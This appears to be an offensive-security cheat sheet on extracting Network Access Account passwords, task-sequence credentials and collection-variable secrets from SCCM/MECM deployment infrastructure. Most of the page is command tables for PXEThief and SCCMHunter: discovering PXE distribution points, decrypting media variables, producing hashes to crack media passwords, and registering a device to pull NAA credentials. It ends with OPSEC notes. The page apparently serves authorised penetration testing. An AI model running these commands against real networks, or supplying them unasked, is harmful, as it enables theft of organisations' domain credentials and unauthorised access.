PXE / SCCM Credential Exposure¶
Extract Network Access Account (NAA) passwords, task-sequence credentials, and collection-variable secrets from SCCM / MECM deployment data.
Quick start (PXEThief)¶
- Requires a reachable distribution point (DP) offering PXE deployment to your host. No domain credentials required; the media password must be absent, known, or cracked.
- PXEThief requires Windows, Python, Npcap, and the TFTP client.
git clone https://github.com/MWR-CyberSec/PXEThief.git
cd PXEThief
python -m pip install -r requirements.txt
Set manual_interface_selection_by_id = <interface_id> under [SCAPY SETTINGS] in settings.ini before modes 1 / 2. Packet-capture permissions required.
| Action | Command |
|---|---|
| List interfaces | python pxethief.py 10 |
| Discover a PXE server through DHCP | python pxethief.py 1 |
| Target a known DP | python pxethief.py 2 <dp_ip> |
| Extract media-password cracking material | python pxethief.py 5 "<variables_file>" |
| Decrypt media variables and retrieve policies | python pxethief.py 3 "<variables_file>" "<media_password>" |
- Modes 1 / 2 print TFTP commands. Download protected media before using modes 5 / 3.
auto_exploit_blank_password = 1(default) automatically downloads/decrypts unprotected media and retrieves policies. Set to0to print download commands only.- Mode 5 outputs
$sccm$aes128$...for this Hashcat module. Copy the hash without status text. Cracking recovers the media password, not an AD password.
SCCMHunter¶
git clone https://github.com/garrettfoster13/sccmhunter.git
cd sccmhunter
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt
Discovery¶
Requires AD credentials and LDAP access. Run find before smb.
| Action | Command |
|---|---|
| Find SCCM infrastructure | python3 sccmhunter.py find -u '<user>' -p '<password>' -d <domain> -dc-ip <dc_ip> |
| Review discovered infrastructure | python3 sccmhunter.py show -all |
| Profile servers and save PXE variables | python3 sccmhunter.py smb -u '<user>' -p '<password>' -d <domain> -dc-ip <dc_ip> -save |
findchecksSystem Management, published management points, WDS objects, and SCCM/MECM names.-savedownloads readableREMINST/SMSTemp/*.varfiles to~/.sccmhunter/logs/loot/; decrypt with PXEThief.
smbalso probes HTTP/MSSQL and may start Remote Registry. Verify service-state restoration afterward.
NAA credentials¶
Requires computer-account credentials and a management point (MP) accepting registration and NAA policy requests. http registers an SCCM device identity.
| Action | Command |
|---|---|
| Retrieve NAA credentials with Kerberos | python3 sccmhunter.py http -d <domain> -dc-ip <dc_ip> -mp <mp_fqdn> -cn '<computer>$' -cp '<computer_password>' -ck |
| Review recovered credentials | python3 sccmhunter.py show -creds |
-mpidentifies the MP, which may differ from the PXE DP. Kerberos requires a resolvable FQDN and synchronized clock.-ck: computer-account Kerberos.-cn/-cp: existing computer credentials.-autocreates an AD computer account, requiring permissions/quota.
Notes / OPSEC¶
- NAA: Reads deployment content; not inherently privileged. Task-sequence execution accounts are separate.
- Network: DHCP/PXE uses UDP 67/68/4011. Direct DP requests can cross routed networks. TFTP needs UDP/69 and negotiated transfer ports; policy retrieval needs MP connectivity.
- Deployment: PXEThief retrieves files without booting. Booting a task sequence can reimage the host.
- Cleanup: Remove assessment-created SCCM registrations and AD objects.
- Output: PXEThief writes decrypted data/certificates locally; SCCMHunter uses
~/.sccmhunter/.